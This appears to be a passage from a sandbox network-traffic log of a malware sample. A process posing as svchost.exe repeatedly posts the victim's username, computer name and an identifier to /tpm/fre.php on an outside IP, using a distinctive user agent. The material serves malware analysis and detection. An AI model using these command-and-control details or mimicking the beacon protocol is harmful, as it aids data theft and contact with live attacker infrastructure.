Jan 7, 2025 11:02:30.085556984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:30.594582081 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49854	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:30.763972998 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:30.768827915 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:31.270286083 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:31 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49860	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:31.460874081 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:31.465790033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:31.967292070 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:31 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49865	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:32.158081055 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:32.162957907 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:32.650672913 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:32 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49872	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:33.120745897 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:33.125642061 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:33.618325949 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:33 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49877	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:33.772530079 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:33.779103994 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:34.281630039 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:34 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49883	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:34.497632980 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:34.503792048 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:35.002384901 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:34 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49889	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:35.147341013 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:35.152173996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:35.669400930 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:35 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49895	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:35.824559927 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:35.829436064 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:36.331146955 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:36 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49901	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:36.473862886 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:36.478730917 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:36.981138945 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:36 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49907	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:37.130702972 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:37.135566950 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:37.629764080 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:37 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49912	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:37.903348923 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:37.908205986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:38.440361977 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:38 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49915	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:38.584865093 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:38.589708090 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:39.104259968 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:39 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49920	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:39.253199100 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:39.258110046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:39.771805048 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:39 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49926	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:39.967674017 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:39.972589970 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:40.445399046 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:40 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49932	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:40.630846977 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:40.635703087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:41.133944035 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:41 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49934	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:41.298851967 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:41.303821087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:41.803622007 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:41 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49940	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:41.962018013 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:41.967236996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:42.460005999 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:42 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49946	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:42.619941950 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:42.625052929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:43.145533085 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:43 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49952	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:43.358571053 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:43.363394022 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:43.852346897 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:43 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49958	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:44.014785051 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
